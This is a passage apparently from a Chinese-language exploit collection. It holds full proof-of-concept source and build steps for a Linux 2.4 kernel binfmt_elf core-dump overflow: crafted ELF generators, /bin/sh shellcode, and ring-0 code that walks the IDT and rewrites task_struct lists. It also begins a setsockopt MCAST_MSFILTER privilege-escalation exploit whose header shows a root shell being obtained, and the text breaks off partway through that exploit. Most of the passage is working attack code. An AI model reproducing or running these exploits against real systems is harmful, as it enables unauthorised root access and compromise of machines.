    if ( canjump != 0 )
    {
        canjump = 0;
        siglongjmp( jmpbuf, signo );
    }
    /* unexpected signal: nothing to do */
}

//**************************************************************************************//
//**********************************The end*********************************************//

/*
 * Returns the selector currently loaded in the %cs segment register
 * (x86 only).
 *
 * The original had no return statement and relied on the value happening to
 * stay in %eax, which is undefined behaviour and breaks as soon as the
 * compiler optimises or inlines the function. The value is now moved into a
 * C variable through an output operand and returned explicitly, masked to
 * the 16 selector bits.
 */
int myget_cs()
{
    unsigned int selector = 0;

    __asm__ __volatile__("mov %%cs,%0" : "=r" (selector));
    return (int)(selector & 0xffffu);
}
/*
 * Returns the selector currently loaded in the %ds segment register
 * (x86 only).
 *
 * The original had no return statement and relied on the value happening to
 * stay in %eax, which is undefined behaviour and breaks as soon as the
 * compiler optimises or inlines the function. The value is now moved into a
 * C variable through an output operand and returned explicitly, masked to
 * the 16 selector bits.
 */
int myget_ds()
{
    unsigned int selector = 0;

    __asm__ __volatile__("mov %%ds,%0" : "=r" (selector));
    return (int)(selector & 0xffffu);
}
/*
 * Driver for the demo system call new_call().
 *
 * Calls configure() to populate the globals, fills a 1024-byte buffer with
 * NOP ('A'), stores the address of load_highlevel in the two consecutive
 * words at byte offsets 256+8 and 256+8+4, prints the addresses of
 * load_highlevel, set_root and sc, and passes the buffer with
 * len = 256+8+4+4 to new_call().
 *
 * argc/argv and the local i are unused. The function has no return
 * statement.
 */
int main(int argc,char **argv)
{
char code[1024];
unsigned int len;
int i;
//stack_bottom=0x80000000;
configure();
memset(code,NOP,1024);
len = 256+8+4+4;
printf("code addr is:%p\nset_root is:%p\nsc is:%p\n",&load_highlevel,&set_root,&sc);
/* the same address is written twice, at offsets 264 and 268 */
*(int *)(code+256+8) = (int)&load_highlevel;//eip
*(int *)(code+256+8+4) = (int)&load_highlevel;//eip

new_call(len,code);

}

六、感谢
感谢陈宇(grip2)和梁彬(lb)的讨论和帮助

Linux binfmt_elf core dump buffer overflow exploit

#!/bin/bash
#
####################################################
#
# Linux binfmt_elf core dump buffer overflow (PoC)
# (Kernel-2.4.22)
#
# 2006-04-30
# Written by :
# grip2
# airsupply
#
####################################################

## overflow.c
cat <<> overflow.c
/*
* Written by :
* grip2
* airsupply
*/

#include
#include
#include
#include

#include
#include

#include


/*
 * Two-stage launcher.
 *
 * First run (argv[0] is not "SELF2"): raises RLIMIT_CORE to unlimited, then
 * re-executes its own binary with argv[0] set to "SELF2" and an environment
 * made of nine copies of a PAGE_SIZE-1 character string of 'A's.
 * Second run (argv[0] is "SELF2"): executes "badelf" with that same string
 * as its single argument and a NULL environment.
 *
 * Returns 1 when setrlimit() or either execve() fails; "return 0" is never
 * reached because every path before it ends in "goto err".
 */
int main(int argc, char *argv[])
{
int esp;
struct rlimit rl;
int res;
int i;
char *env[10];
char page[PAGE_SIZE];

/* NOTE(review): esp is listed as an input operand although the instruction
 * writes to it; it is also an int printed with %p below */
__asm__("movl %%esp, %0" : : "m"(esp));
printf("arg_start: %p arg_end: %p esp: %p\n",
argv[0], argv[argc-1]+strlen(argv[argc-1]), esp);

/* allow core files of any size */
rl.rlim_cur = RLIM_INFINITY;
rl.rlim_max = RLIM_INFINITY;
res = setrlimit(RLIMIT_CORE, &rl);
if (res != 0) {
perror("setrlimit");
goto err;
}

/* page becomes a NUL-terminated string of PAGE_SIZE-1 'A' characters */
memset(page, 'A', sizeof(page));
page[sizeof(page)-1] = 0;

/* env[0..8] all point at page; env[9] terminates the vector */
for (i = 0; i < 9; i++)
env[i] = page;
env[i] = 0;

if (strcmp(argv[0], "SELF2") == 0) {
char *av[] = {"badelf", page, 0};
execve("badelf", av, NULL);
/* execve("test_elf", av, NULL); */
perror("execve: badelf");
goto err;
}


/* first stage: run ourselves again under the name "SELF2" */
char *av[] = {"SELF2", 0};
execve(argv[0], av, env);

perror("execve self:");
goto err;

return 0;
err:
return 1;
}
__EOF__

## mkbadelf.c
cat <<> mkbadelf.c
/*
* Written by grip2
*/

#include
#include
#include
#include
#include
#include
#include
#include

char sc[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

extern test;
__asm__ (
"test:\n\t"
"cli \n\t"
"hlt \n\t"
"movl \$0xbffff000, %eax \n\t"
// "movl \$0x42, (%eax) \n\t"
"int3 \n\t"
);

int main()
{
#define ENTRY_OFFSET 4096
int fd = -1;
Elf32_Ehdr ehdr;
Elf32_Phdr phdr;
Elf32_Shdr shdr;
int i;
unsigned char code_align[4096];
unsigned char data_align[0x7000];

fd = open("badelf", O_WRONLY|O_CREAT|O_TRUNC, S_IRWXU);
if (fd == -1) {
perror("open badelf");
goto err;
}

memset(&ehdr, 0, sizeof(ehdr));

ehdr.e_ident[EI_MAG0] = 0x7f;
ehdr.e_ident[EI_MAG1] = 'E';
ehdr.e_ident[EI_MAG2] = 'L';
ehdr.e_ident[EI_MAG3] = 'F';
ehdr.e_ident[EI_CLASS] = ELFCLASS32;
ehdr.e_ident[EI_DATA] = ELFDATA2LSB;
ehdr.e_ident[EI_VERSION] = EV_CURRENT;

ehdr.e_type = ET_EXEC ;
ehdr.e_machine = EM_386;
ehdr.e_version = EV_CURRENT;

ehdr.e_ehsize = sizeof(Elf32_Ehdr);
ehdr.e_phentsize = sizeof(Elf32_Phdr);
ehdr.e_shentsize = sizeof(Elf32_Shdr);

ehdr.e_phnum = 2;
ehdr.e_phoff = sizeof(Elf32_Ehdr);
ehdr.e_shnum = 0;
ehdr.e_shoff = 0;

ehdr.e_shstrndx = 0;
ehdr.e_flags = 0;
ehdr.e_entry = 0x08480000 + ENTRY_OFFSET;

write(fd, &ehdr, sizeof(ehdr)); /* Elf header */

phdr.p_type = PT_LOAD;
phdr.p_offset = 0;
phdr.p_vaddr = 0x08480000;
phdr.p_paddr = phdr.p_vaddr;
phdr.p_filesz = ENTRY_OFFSET + sizeof(code_align);
phdr.p_memsz = ENTRY_OFFSET + sizeof(code_align);
phdr.p_flags = PF_R|PF_X|PF_W;
phdr.p_align = 0x1000;

write(fd, &phdr, sizeof(phdr)); /* Phdr header - PT_LOAD */

phdr.p_type = PT_LOAD;
phdr.p_offset = ENTRY_OFFSET + sizeof(code_align);
phdr.p_vaddr = 0xbfff8000;
phdr.p_paddr = phdr.p_vaddr;
phdr.p_filesz =sizeof(data_align);
phdr.p_memsz = sizeof(data_align);
phdr.p_flags = 0;
phdr.p_align = 0x1000;

write(fd, &phdr, sizeof(phdr)); /* Phdr header - PT_LOAD */

lseek(fd, ENTRY_OFFSET, SEEK_SET);
memset(code_align, '\x90', sizeof(code_align));
#if 1
//unsigned char int3 = 0xcc;
//memcpy(code_align, &int3, sizeof(int3));
memcpy(code_align, &test, 32);
#else
memcpy(code_align, sc, sizeof(sc));
#endif
write(fd, code_align, sizeof(code_align)); /* part of TEXT Segment */

memset(data_align, 'A', sizeof(data_align));
lseek(fd, ENTRY_OFFSET + sizeof(code_align), SEEK_SET);
write(fd, data_align, sizeof(data_align)); /* DATA Segment */

close(fd);
return 0;
err:
if (fd != -1)
close(fd);
return -1;
}
__EOF__

## mklcall.c
cat <<> mklcall.c
/*
* Written by :
* grip2
* airsupply
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include


#define g__syscall_return(type, res) \
do { \
if ((unsigned long)(res) >= (unsigned long)(-125)) { \
res = -1; \
} \
return (type) (res); \
} while (0)

#define g_syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type g_##name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile ("int \$0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3))); \
g__syscall_return(type,__res); \
}

static inline g_syscall3(int, write, int, fd, const void *, buf, off_t, count)

char sc[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

void exploit_end(void);

struct list_head {
struct list_head *next, *prev;
};

struct task_struct {
/*
* offsets of these are hardcoded elsewhere - touch with care
*/
volatile long state; /* -1 unrunnable, 0 runnable, >0 stopped */
unsigned long flags; /* per process flags, defined below */
int sigpending;
unsigned long addr_limit; /* thread address space:
0-0xBFFFFFFF for user-thead
0-0xFFFFFFFF for kernel-thread
*/
struct exec_domain *exec_domain;
volatile long need_resched;
unsigned long ptrace;

int lock_depth; /* Lock depth */

/*
* offset 32 begins here on 32-bit platforms. We keep
* all fields in a single cacheline that are needed for
* the goodness() loop in schedule().
*/
long counter;
long nice;
unsigned long policy;
void *mm;
int processor;
/*
* cpus_runnable is ~0 if the process is not running on any
* CPU. It's (1 << cpu) if it's running on a CPU. This mask
* is updated under the runqueue lock.
*
* To determine whether a process might run on a CPU, this
* mask is AND-ed with cpus_allowed.
*/
unsigned long cpus_runnable, cpus_allowed;
/*
* (only the 'next' pointer fits into the cacheline, but
* that's just fine.)
*/
struct list_head run_list;
unsigned long sleep_time;

struct task_struct *next_task, *prev_task;
void *active_mm;
struct list_head local_pages;
unsigned int allocation_order, nr_local_pages;

/* task state */
void *binfmt;
int exit_code, exit_signal;
int pdeath_signal; /* The signal sent when the parent dies */
/* ??? */
unsigned long personality;
int did_exec:1;
unsigned task_dumpable:1;
pid_t pid;
pid_t pgrp;
pid_t tty_old_pgrp;
pid_t session;
pid_t tgid;
/* boolean value for session group leader */
int leader;
/*
* pointers to (original) parent process, youngest child, younger sibling,
* older sibling, respectively. (p->father can be replaced with
* p->p_pptr->pid)
*/
struct task_struct *p_opptr, *p_pptr, *p_cptr, *p_ysptr, *p_osptr;
struct list_head thread_group;

/* PID hash table linkage. */
struct task_struct *pidhash_next;
struct task_struct **pidhash_pprev;

struct list_head wait_chldexit; /* for wait4() */
};

/*
 * Links the node "new" into a doubly linked list between "prev" and "next"
 * by updating the four affected next/prev pointers.
 * The caller supplies prev and next; the function does not check that they
 * are actually adjacent.
 */
static inline void __list_add(struct list_head *new,
struct list_head *prev,
struct list_head *next)
{
next->prev = new;
new->next = next;
new->prev = prev;
prev->next = new;
}

/*
 * Inserts tsk immediately before head in the circular list formed by the
 * next_task/prev_task members, i.e. between head->prev_task and head.
 */
static inline void add_task_list(struct task_struct *head, struct task_struct *tsk)
{
tsk->next_task = head;
tsk->prev_task = head->prev_task;
/* the old predecessor of head now points forward to tsk */
head->prev_task->next_task = tsk;
head->prev_task = tsk;
}

/*
 * Returns the stack pointer ANDed with ~8191, i.e. rounded down to an
 * 8192-byte boundary, interpreted as a struct task_struct pointer.
 * Presumably this mirrors a layout where the task structure sits at the base
 * of an 8 KB stack area -- that layout is assumed, not checked here.
 */
static inline struct task_struct * get_current(void)
{
struct task_struct *current;
/* "0" ties the input to operand 0, so current starts as ~8191 and is ANDed
 * with %esp in place */
__asm__("andl %%esp,%0; ":"=r" (current) : "0" (~8191UL));
return current;
}

void exploit_start(void) {}
void exploit()
{
__asm__ __volatile__ ("
nop

nop
jmp x1
nop
nop
nop
nop
nop
nop
x1:
cli ## must do
pusha
pushl %esp
popl %eax
sidt (%eax)
movl 2(%eax),%eax
xorl %ebx,%ebx
movb \$0xfb,%bl
rol \$0x3,%ebx
add %ebx,%eax
movw 6(%eax),%di
rol \$16,%edi
movw (%eax),%di
find_smp:
inc %edi
movb (%edi),%bl
cmpb \$0xe8,%bl
jnz find_smp
inc %edi
add (%edi),%edi
find:
dec %edi
movl (%edi),%eax
and \$0x0000ffff,%eax
cmpl \$0x00ec83,%eax
jnz find
aaaa:
jmp xxx
bback:
push %edi
ret
xxx:
call bback
bbbbbb:
cli ## must do
popa
nop
ret
");

{
struct list_head *runqueue_head;
struct task_struct *init_task;
struct task_struct *current, *parent, *copy_task;
int i;

runqueue_head = (void *) 0xc0335ec0;
init_task = (void *) 0xc037c000;

//__asm__ ("cli");
for(i = 0; i < 100000000; i++) /* wait a moment ... */
__asm__ __volatile__ ("nop");

__asm__ __volatile__ ("
movl (%1),%0;"
:"=r" (parent)
:"r" (20)); /* task pointer of parent */

copy_task = parent->p_cptr;
current = get_current();

runqueue_head->prev = runqueue_head;
runqueue_head->next = runqueue_head;
init_task->prev_task = init_task;
init_task->next_task = init_task;

/*
for (i = 0; i < 20; i++) {
tsk = find_task_by_pid(i);
if (tsk && tsk->state == 0) {
__list_add(&tsk->run_list, runqueue_head, runqueue_head->next);
add_task_list(&init_task, tsk);
}
}
*/

if (parent->state == 0) {
__list_add(&parent->run_list, runqueue_head, runqueue_head->next);
add_task_list(init_task, parent);
}

if (parent->p_pptr->state == 0) {
__list_add(&parent->p_pptr->run_list, runqueue_head, runqueue_head->next);
add_task_list(init_task, parent->p_pptr);
}

memcpy(current, copy_task, sizeof(struct task_struct));

__list_add(¤t->run_list, runqueue_head, runqueue_head->next);
add_task_list(init_task, current);

/*
* current->p_opptr
* current->p_pptr
*/
current->p_cptr = NULL;
current->p_ysptr = NULL;
current->p_osptr = NULL;
current->pid = 65535;
current->state = -1;
current->need_resched = 1;
current->sigpending = 0;
}

#ifdef __TEST_LCALL__
i = 'A';
for (;;)
g_write(1, &i, 1);
for (;;) __asm__ __volatile__("hlt");
#endif

/* __asm__ ("sti"); */
}

/*
extern exploit;
__asm__ (
"exploit:\n\t"
"cli \n\t"
"hlt \n\t"
"int3 \n\t"
);
*/

void exploit_end(void) {}

static inline g_syscall3(int, sigaction, int, signum, const struct sigaction *, act,
struct sigaction *, oldact)

void lcall(void);
void lcall_end(void);

void lcall(void)
{
struct sigaction old, new;
void *loop_addr;

__asm__ volatile (
"jmp get_loop_addr\n\t"
"ret_loop_addr:\n\t"
"popl %0\n\t"
:"=m" (loop_addr) :);

bzero(&new, sizeof(new));
new.sa_handler = loop_addr;
g_sigaction(SIGSEGV, &new, &old);

__asm__ volatile (
"jmp do_lcall;"
"get_loop_addr: "
"call ret_loop_addr;"
"ret;"
"do_lcall:"
);
while (1) {
__asm__ ("lcall \$0x7, \$0x0");
}
}
void lcall_end(void) {}

int main()
{
#define ENTRY_OFFSET 4096
int fd = -1;
Elf32_Ehdr ehdr;
Elf32_Phdr phdr;
Elf32_Shdr shdr;
int i;
unsigned char code_align[4096];

fd = open("lcall", O_WRONLY|O_CREAT|O_TRUNC, S_IRWXU);
if (fd == -1) {
perror("open lcall");
goto err;
}

memset(&ehdr, 0, sizeof(ehdr));

ehdr.e_ident[EI_MAG0] = 0x7f;
ehdr.e_ident[EI_MAG1] = 'E';
ehdr.e_ident[EI_MAG2] = 'L';
ehdr.e_ident[EI_MAG3] = 'F';
ehdr.e_ident[EI_CLASS] = ELFCLASS32;
ehdr.e_ident[EI_DATA] = ELFDATA2LSB;
ehdr.e_ident[EI_VERSION] = EV_CURRENT;

ehdr.e_type = ET_EXEC ;
ehdr.e_machine = EM_386;
ehdr.e_version = EV_CURRENT;

ehdr.e_ehsize = sizeof(Elf32_Ehdr);
ehdr.e_phentsize = sizeof(Elf32_Phdr);
ehdr.e_shentsize = sizeof(Elf32_Shdr);

ehdr.e_phnum = 2;
ehdr.e_phoff = sizeof(Elf32_Ehdr);
ehdr.e_shnum = 0;
ehdr.e_shoff = 0;

ehdr.e_shstrndx = 0;
ehdr.e_flags = 0;
ehdr.e_entry = 0x08480000 + ENTRY_OFFSET;

write(fd, &ehdr, sizeof(ehdr)); /* Elf header */

phdr.p_type = PT_LOAD;
phdr.p_offset = 0;
phdr.p_vaddr = 0x08480000;
phdr.p_paddr = phdr.p_vaddr;
phdr.p_filesz = ENTRY_OFFSET + sizeof(code_align);
phdr.p_memsz = ENTRY_OFFSET + sizeof(code_align);
phdr.p_flags = PF_R|PF_X|PF_W;
phdr.p_align = 0x1000;

write(fd, &phdr, sizeof(phdr)); /* Phdr header - PT_LOAD */

phdr.p_type = PT_LOAD;
phdr.p_offset = ENTRY_OFFSET + sizeof(code_align);
phdr.p_vaddr = 0x0;
phdr.p_paddr = phdr.p_vaddr;
phdr.p_filesz = sizeof(code_align);
phdr.p_memsz = sizeof(code_align);
phdr.p_flags = PF_R|PF_X|PF_W;
phdr.p_align = 0x1000;

write(fd, &phdr, sizeof(phdr)); /* Phdr header - PT_LOAD */

memset(code_align, '\x90', sizeof(code_align));
memcpy(code_align, lcall, &lcall_end - &lcall);
lseek(fd, ENTRY_OFFSET, SEEK_SET);
write(fd, code_align, sizeof(code_align)); /* part of TEXT Segment */

/* virtual address 0x00000000:
* [execdomain name pointer][handler for syscalls][stack & register save][jmp code][task pointer of parent])
* 4 4 8 4 4
*/
memset(code_align, '\x90', sizeof(code_align));
memcpy(code_align, "\x90\x90\xff\x25\x08\x00\x00\x00", 8); /* handler for syscalls */
// memcpy(code_align, "\x00\x00\x00\x00\x08\x00\x00\x00", 8); /* handler for syscalls */
memcpy(code_align+8, &exploit, &exploit_end - &exploit);
// memcpy(code_align, sc, sizeof(sc));
lseek(fd, ENTRY_OFFSET + sizeof(code_align), SEEK_SET);
write(fd, code_align, sizeof(code_align)); /* 0x0 Segment for lcall27 */

close(fd);
return 0;
err:
if (fd != -1)
close(fd);
return -1;
}
__EOF__

## kexp_coredump.c
cat <<> kexp_coredump.c
/*
* Written by :
* grip2
* airsupply
*/

#include
#include
#include
#include

#include
#include

#define BINELF_OVERFLOW "overflow"
#define BINELF_LCALL "lcall"

#include
#include
#include
#include
#include

void *first_o_task = NULL;
void *o_task, *y_task;
void *parent_task = NULL;

struct list_head {
struct list_head *next, *prev;
};


struct task_struct {
/*
* offsets of these are hardcoded elsewhere - touch with care
*/
volatile long state; /* -1 unrunnable, 0 runnable, >0 stopped */
unsigned long flags; /* per process flags, defined below */
int sigpending;
unsigned long addr_limit; /* thread address space:
0-0xBFFFFFFF for user-thead
0-0xFFFFFFFF for kernel-thread
*/
struct exec_domain *exec_domain;
volatile long need_resched;
unsigned long ptrace;

int lock_depth; /* Lock depth */

/*
* offset 32 begins here on 32-bit platforms. We keep
* all fields in a single cacheline that are needed for
* the goodness() loop in schedule().
*/
long counter;
long nice;
unsigned long policy;
void *mm;
int processor;
/*
* cpus_runnable is ~0 if the process is not running on any
* CPU. It's (1 << cpu) if it's running on a CPU. This mask
* is updated under the runqueue lock.
*
* To determine whether a process might run on a CPU, this
* mask is AND-ed with cpus_allowed.
*/
unsigned long cpus_runnable, cpus_allowed;
/*
* (only the 'next' pointer fits into the cacheline, but
* that's just fine.)
*/
struct list_head run_list;
unsigned long sleep_time;

struct task_struct *next_task, *prev_task;
void *active_mm;
struct list_head local_pages;
unsigned int allocation_order, nr_local_pages;

/* task state */
void *binfmt;
int exit_code, exit_signal;
int pdeath_signal; /* The signal sent when the parent dies */
/* ??? */
unsigned long personality;
int did_exec:1;
unsigned task_dumpable:1;
pid_t pid;
pid_t pgrp;
pid_t tty_old_pgrp;
pid_t session;
pid_t tgid;
/* boolean value for session group leader */
int leader;
/*
* pointers to (original) parent process, youngest child, younger sibling,
* older sibling, respectively. (p->father can be replaced with
* p->p_pptr->pid)
*/
struct task_struct *p_opptr, *p_pptr, *p_cptr, *p_ysptr, *p_osptr;
struct list_head thread_group;

/* PID hash table linkage. */
struct task_struct *pidhash_next;
struct task_struct **pidhash_pprev;

struct list_head wait_chldexit; /* for wait4() */
};

/*
 * Opens ./core.<pid>, walks the note entries of the segment described by the
 * first program header until one with n_type == 0x4 is found, reads that
 * note's descriptor into a local buffer and interprets it as a
 * struct task_struct.
 *
 * Side effects on globals:
 *   y_task, o_task  - set to the p_ysptr / p_osptr members of the record
 *   first_o_task    - set to o_task the first time it is NULL
 *   parent_task     - set to the p_pptr member the first time it is NULL
 *
 * Returns 0. Calls exit(-1) if the open-failure check triggers.
 *
 * NOTE(review):
 *  - fd is declared FILE * but receives the int result of open() and is then
 *    passed to read()/lseek(); open() reports failure with -1, not NULL, so
 *    the failure check below does not detect a failed open.
 *  - the descriptor is opened but never closed.
 *  - nhdr.n_descsz bytes are read into the 0x1000-byte _task buffer without
 *    checking that n_descsz fits.
 *  - none of the read()/lseek() results are checked, so the note loop does
 *    not terminate on a truncated file.
 *  - 0x4 is presumably NT_TASKSTRUCT and the "+4" skips are presumably the
 *    padded note name; confirm against <elf.h> and the core file layout.
 */
static int read_coredump(int pid)
{
char corefile[128];
char _task[0x1000];
FILE *fd=NULL;
int tmp_size;
int rd_len=0;
struct task_struct *ptask;
// task_struct *task_s;
Elf32_Ehdr ehdr;
Elf32_Phdr phdr;
Elf32_Nhdr nhdr;

memset(corefile,0,sizeof(corefile));
memset(_task,0,sizeof(_task));
sprintf(corefile,"./core.%d",pid);
printf("opening:%s\n",corefile);
if((fd=open(corefile,O_RDONLY))==NULL)
{
perror("open coredump file:");
exit(-1);
}
// lseek(fd,sizeof(Elf32_Ehdr),SEEK_SET);
/* the ELF header is followed directly by the first program header */
read(fd,&ehdr,sizeof(Elf32_Ehdr));
read(fd,&phdr,sizeof(Elf32_Phdr));
/*
printf("sizeof Elf32_Ehdr:%x\n",sizeof(Elf32_Ehdr));
printf("ehdr.e_phoff:%x\n",ehdr.e_phoff);
printf("ehdr.e_phnum:%x\n",ehdr.e_phnum);
printf("phdr.p_type:%x\n",phdr.p_type);
printf("phdr.p_offset:%x\n",phdr.p_offset);
printf("phdr.p_filesz:%x\n",phdr.p_filesz);
*/
/* iterate over the note headers stored at phdr.p_offset */
lseek(fd,phdr.p_offset,SEEK_SET);
while(1){
read(fd,&nhdr,sizeof(Elf32_Nhdr));
if(nhdr.n_type==0x4)
break;
// printf("%x\n",nhdr.n_descsz);
/* skip this note's descriptor plus 4 more bytes */
lseek(fd,nhdr.n_descsz+4,SEEK_CUR);
}
/* skip 4 bytes, then read the descriptor of the matching note */
lseek(fd,4,SEEK_CUR);
rd_len=read(fd,&_task,nhdr.n_descsz);
ptask=(struct task_struct *)&_task;
// printf("pid: %d\n",ptask->pid);

y_task = ptask->p_ysptr;
o_task = ptask->p_osptr;

/* only the first value seen is kept in first_o_task / parent_task */
if (!first_o_task)
first_o_task = o_task;

if (!parent_task)
parent_task = ptask->p_pptr;

// printf("parent: %p\n", ptask->p_pptr);
return 0;

}

/*
 * Parses the core file for pid via read_coredump() and reports whether the
 * distance between the globals y_task and first_o_task, measured in
 * 8192-byte units, lies in the range 1..10.
 *
 * Prints parent_task, first_o_task, y_task and the computed distance.
 *
 * Returns 1 when the distance is within 1..10, otherwise 0 (also 0 when
 * read_coredump() returns -1).
 */
static int check_coredump(int pid)
{
    long byte_gap;
    int slots;

    if (read_coredump(pid) == -1) {
        return 0;
    }

    byte_gap = (long) y_task - (long) first_o_task;
    slots = byte_gap / 8192;

    printf("parent: %p overflow: %p lcall: %p [%d]\n",
           parent_task, first_o_task, y_task, slots);

    return (slots >= 1 && slots <= 10) ? 1 : 0;
}

/*
 * Raises the core-file size limit to unlimited and then deliberately stores
 * through address 0 so that the process is killed by a fault.
 *
 * Returns normally only when setrlimit() fails (after reporting the error
 * with perror()).
 */
static void make_coredump()
{
    struct rlimit unlimited;

    unlimited.rlim_cur = RLIM_INFINITY;
    unlimited.rlim_max = RLIM_INFINITY;

    if (setrlimit(RLIMIT_CORE, &unlimited) != 0) {
        perror("setrlimit");
        return;
    }

    /* intentional invalid store: the resulting fault ends the process */
    *(int *) 0 = 0;
}

/*
 * Patches the file named by BINELF_LCALL in place: seeks to byte offset
 * 8192+4+4+8+4 and writes the value of the global parent_task there
 * (sizeof(parent_task) bytes).
 *
 * Returns 0 after the write, or -1 when the file cannot be opened.
 * NOTE(review): the results of lseek() and write() are not checked, so a
 * short or failed write is still reported as success.
 */
static int fix_lcall()
{
int fd;

fd = open(BINELF_LCALL, O_RDWR);
if (fd == -1) {
perror("open "BINELF_LCALL);
return -1;
}

/* virtual address 0x00000000:
* [execdomain name pointer][handler for syscalls][stack & register save][jmp code][task pointer of parent])
* 4 4 8 4 4
*/
/* 8192 is the file offset of that region; 4+4+8+4 skips the first four
 * fields listed above so the write lands on the last one */
lseek(fd, 8192+4+4+8+4, SEEK_SET);
write(fd, &parent_task, sizeof(parent_task));
close(fd);
return 0;
}

int main(int argc, char *argv[])
{
int pipe_of[2] = {-1, -1};
int pipe_lcall[2] = {-1, -1};
int pipe_mcd[2] = {-1, -1};
int mcd_pid, lcall_pid, copy_pid;
int status;
int i;

if (pipe(pipe_of) == -1) {
perror("pipe overflow");
goto err;
}
if (pipe(pipe_mcd) == -1) {
perror("pipe make_coredump");
goto err;
}
if (pipe(pipe_lcall) == -1) {
perror("pipe_lcall");
goto err;
}

/* overflow process */
if (fork() == 0) {
char cmd[32];
if (read(pipe_of[0], cmd, sizeof(cmd)) == -1) {
perror("read pipe_of");
exit(1);
}
if (strncmp(cmd, "start", 5) == 0) {
char *p[] = {BINELF_OVERFLOW, cmd+5, 0};
execve(BINELF_OVERFLOW, p, 0);
perror(BINELF_OVERFLOW);
}
else if (strcmp(cmd, "stop") == 0) {
exit(0);
}
fprintf(stderr, "pipe_of command \"%s\" error!\n", cmd);
exit(1);
}

while (1) {
/* make coredump file process */
if ((mcd_pid = fork()) == 0) {
char cmd[8];
if (read(pipe_mcd[0], cmd, sizeof(cmd)) == -1) {
perror("read pipe_mcd");
exit(1);
}
if (strcmp(cmd, "start") == 0) {
make_coredump();
fprintf(stderr, "make coredump file failed!\n");
exit(1);
}
else if (strcmp(cmd, "stop") == 0) {
exit(0);
}

fprintf(stderr, "pipe_mcd command \"%s\" error!\n", cmd);
exit(1);
}

/* lcall process */
if ((lcall_pid = fork()) == 0) {
char cmd[8];
if (read(pipe_lcall[0], cmd, sizeof(cmd)) == -1) {
perror("read pipe_lcall");
exit(1);
}
if (strcmp(cmd, "start") == 0) {
char *p[] = {BINELF_LCALL, 0};
execve(BINELF_LCALL, p, 0);
perror(BINELF_LCALL);
exit(1);
}
else if (strcmp(cmd, "pause") == 0) {
pause();
exit(0);
}
else if (strcmp(cmd, "stop") == 0) {
exit(0);
}
fprintf(stderr, "pipe_lcall command \"%s\" error!\n", cmd);
exit(-1);
}

write(pipe_mcd[1], "start", 6);
sleep(1);
while (1) {
if (waitpid(mcd_pid, &status, 0) < 0)
break;
}

if (!check_coredump(mcd_pid)) {
write(pipe_lcall[1], "pause", 6);
system("rm -rf core.*");
continue;
}

break;
}

if (fix_lcall() == -1)
goto err;

if ((copy_pid = fork()) == 0) {
char *p[] = {"lcall", 0};
execve("lcall", p, 0);
perror("lcall");
while (1)
printf("panic ...\n");
}

write(pipe_lcall[1], "start", 6);
sleep(1);
kill(copy_pid, SIGSTOP);
printf("please press to start ...\n");
getchar();
printf("exploiting, wait a moment ...\n");

char ofcmd[16];
sprintf(ofcmd, "start%d\0", lcall_pid);
write(pipe_of[1], ofcmd, strlen(ofcmd)+1);

FILE *fp;
char buf[256];
while(1) {
printf("******** in parent, waiting for root\n");
fp = fopen("/proc/interrupts","r");
while (!feof(fp)) {
fgets(buf, sizeof(buf), fp);
printf(buf);
}
fclose(fp);
for(i = 0; i < 2000000000; i++);
}
return 0;
err:
if (pipe_lcall[0] != -1) {
close(pipe_lcall[0]);
close(pipe_lcall[1]);
}
if (pipe_mcd[0] != -1) {
close(pipe_mcd[0]);
close(pipe_mcd[1]);
}
if (pipe_of[1] != -1) {
close(pipe_of[0]);
close(pipe_of[1]);
}
return 1;
}
__EOF__


make kexp_coredump
make overflow
make mkbadelf
gcc mklcall.c -o mklcall -O2
./mkbadelf
./mklcall
./kexp_coredump

Linux kernel setsockopt MCAST_MSFILTER权限提升(EXP)

/*
* Linux kernel setsockopt MCAST_MSFILTER privilege elevation
* For kernel 2.4.22 - 2.4.25
*
* 2006-04-07
* Written by grip2
* Thanks airsupply
*
* grip2@debian:~/kernel-sec/exp-msfilter$ ./kexp-msfilter
* numsrc: 0x4000000c msize: 0x40 gsize: 0x68c optlen: 0x68c
* Prepare ...
* full_numsrc: 15 overflow_numsrc: 3
* size-64 87 118 64 2 2 1
* size-64 119 177 64 3 3 1
* Exploiting ...
* setsockopt: Cannot assign requested address
* sh-2.05b#
**/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define KB * 1024
#define MB * 1024 KB
#define GB * 1024 MB
#define NOP 'A'
int uid, gid;
unsigned task_size;
unsigned user_cs,user_ds;

void **sys_call_table;
#define __NR_hijack_getroot 0
static inline _syscall1(int, hijack_getroot, unsigned long *, val)

#define SOL_IP 0
#define MY_NUMSRC 12

#define SIZE_PIPE_INODE_INFO 64 /* sizeof(struct pipe_inode_info) */
#define SLAB_SIZE (fix_slabsize(SIZE_PIPE_INODE_INFO))

#define MAX_SEM_LIMIT 4096
static int sem_handles[MAX_SEM_LIMIT];
static int sem_count = 0;

/*
* (kernel-2.4.22) -- ipc/sem.c
* ...
* size = sizeof (*sma) + nsems * sizeof (struct sem);
* sma = (struct sem_array *) ipc_alloc(size);
* ...
*/
#define COMPUTE_NSEMS(slabsize) (((fix_slabsize(slabsize)) - 56) / 8);

/*
 * Rounds a requested allocation size up to the nearest entry of the
 * general-purpose cache size table (values taken from kernel 2.4.22).
 *
 * slabsize: requested size in bytes.
 *
 * Returns the smallest table entry that is >= slabsize, or slabsize itself
 * when it is larger than every entry. The 32-byte entry is only part of the
 * table when PAGE_SIZE is defined as 4096 at compile time.
 *
 * The parameter is now declared as int explicitly: the original K&R-style
 * definition relied on implicit int, which was removed in C99 and is
 * rejected by current compilers.
 */
static int fix_slabsize(int slabsize)
{
    static const int cache_sizes[] = {
#if PAGE_SIZE == 4096
        32,
